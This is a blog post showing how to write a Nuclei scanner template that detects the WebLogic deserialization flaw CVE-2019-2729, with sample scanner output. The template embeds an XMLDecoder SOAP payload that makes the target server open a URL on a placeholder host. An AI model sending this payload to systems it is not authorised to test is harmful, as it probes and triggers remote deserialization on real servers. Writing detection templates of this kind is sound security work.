Monday, February 15, 2021

Back to post : Nuclei vulnerability scanner

Repo :  https://github.com/projectdiscovery/nuclei

Get the binary or compile the source

Download templates :

git clone https://github.com/projectdiscovery/nuclei-templates.git

Nuclei is based on "signatures" from services based on HTTP/HTTPS (Yara rules based)

It's easy to add "rules" or templates to search for other vulnerabilities and get another vulnerability scanner : additional, light and it's part of a new kind of scanners that use same techniques (not everyone uses yaml).

Notice that it targets low hanging fruits.

Adding a template for weblogic :

1. Analized how previous similar vuln was detected (send a xml by GET)

2. Create a template such as this one :

cat nuclei-templates/weblogic.yaml 

id: CVE-2019-2729


info:

  name: WebLogic Deserialization

  author: wcu35745

  severity: high

  #reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2729

  

requests:

  - method: GET

    path:

      - "{{BaseURL}}/wls-wsat/CoordinatorPortType"

    headers:

      Content-Type: text/xml

      SOAPAction: <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8" class="java.beans.XMLDecoder"><void id="url" class="java.net.URL"><string>http://%s:%d/cve-2017-10271?target=%s%s</string></void><void idref="url"><void id="stream" method = "openStream" /></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>

    matchers:

      - type: status

        status:

            - 200

      - type: word

        words:

            - "weblogic.wsee.wstx.wsat.v10.endpoint.CoordinatorPortTypePortImpl"

        part: body

3. Words come from the response to the request with the xml SOAP envelope.

4. Put the URLs to scan in a text file (http or https://dns_name_or_IP) or use the -t parameter for single target

5. If found vulnerable, an output such as this one will appear :

./nuclei -l targets.txt -t nuclei-templates/weblogic.yaml -v -timeout 20 -retries 3


                       __     _ 

     ____  __  _______/ /__  (_)

    / __ \/ / / / ___/ / _ \/ / 

   / / / / /_/ / /__/ /  __/ /  

  /_/ /_/\__,_/\___/_/\___/_/   v1   


projectdiscovery.io


[WRN] Use with caution. You are responsible for your actions

[WRN] Developers assume no liability and are not responsible for any misuse or damage.

[INF] [CVE-2019-2729] Loaded template WebLogic Deserialization (@wcu35745) [high]

[CVE-2019-2729] https://ip_address/wls-wsat/CoordinatorPortType   

There is no other indication, only the absence of the previous [status] 

No comments: